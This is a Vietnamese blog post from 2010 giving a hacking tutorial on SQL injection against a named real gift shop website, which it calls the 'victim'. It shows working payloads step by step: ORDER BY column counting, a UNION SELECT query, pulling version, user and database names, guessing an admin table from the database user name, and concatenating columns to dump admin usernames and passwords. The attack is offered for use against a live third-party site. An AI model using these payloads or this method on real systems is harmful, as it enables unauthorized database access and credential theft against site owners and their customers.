Thứ Ba, 31 tháng 8, 2010

Tut đoán table dựa theo tên user hoặc tên viết tắt của Web php>v4

Tut hack Php Sql injection v4 writing by FLo
vICtIm : https://www.giftsfromfinland.com/pro...=52&prodID=436
Checked : https://www.giftsfromfinland.com/pro...=52&prodID=436 thêm dấu ' nhá ! > á à mày chết với ông

Ơ lạ nhỉ checked thế quái nào nó lại hiện lên trang trắng thế kia , thử order by cái , có nhiều cách order by để thực hiện

ở đây Flo sài Order by number ( dịch theo tiếng việt nôm na là số ) > number cứ tăng dần đến khi nào xuất hiện number lỗi thì thôi

Thường FLo cứ kiểm tra order by 1 , ko ra gì , order by 100 > trang trắng

vậy ta sẽ order by từ 1 đến khi nào ra số lỗi thì thôi

https://www.giftsfromfinland.com/pro...=52&prodID=436 order by 2 > order by đến 17 vẫn ko có gì




order by đến 18 > Tự nhiên số 17 còn bt , sang 18 là trang trắng > suy ra là số truy vấn trên website với SQL là 17 Field




giờ ta thêm dấu - vào trước số 436 nhé

https://www.giftsfromfinland.com/pro..._ID=52&prodID=-436

Và FLo sử dụng câu lệnh
Code:
UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
anh em nhìn thấy số 3 ko > nếu nhìn thấy số 3 anh em ta sẽ thay số 3 ở trên thành version() để kiểm tra version của shop , thay database() để kiểm tra database , thay user() để kiểm tra user của shop

Version ở đây là 4.1.22-log
User : gff_user@localhost
Database : current_gff_data

Tại sao ta cần những thông tin như database , user > vì ver4 này củ chuối cái là phải đoán table lẫn column > dựa vào đó mà đoán thôi

Tiếp đó đến đoán table nào
Bt sẽ đoán các table như là admin , orders .......... nhưng ko đc > nên chú ý kỹ lại tên user nên FLo với nghĩ ra và thử

UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from gff_admin--


sử dụng đúng câu truy vấn thì nó sẽ trả về site như lúc bình thường
Còn nếu đoán column thì anh em đoán tên từng column thay vào số 3 > khi cảm thấy đủ rồi thì với dùng lệnh

concat(id,0x7c, các tên columnxxxx , 0x7c )


0x7c là FLo sài site http://string-functions.com/string-hex.aspx conver từ ký tự | sang 7c > còn 0x luôn luôn đứng trước các hex

Đoán column thì lắm lúc đơn giản là thế này > anh em đi tìm link admin của site trước sau đó viewsource đoạn username và password rồi thử thôi ;))

Và khi đoán 1 số columns cũng có shop đặt theo tên viết tắt của shop gồm những từ như workpress > là wp
wp_users
wp_user


P/s : victim có thể bị fix nên tut trên đây của FLo chỉ là tham khảo

Không có nhận xét nào:

Đăng nhận xét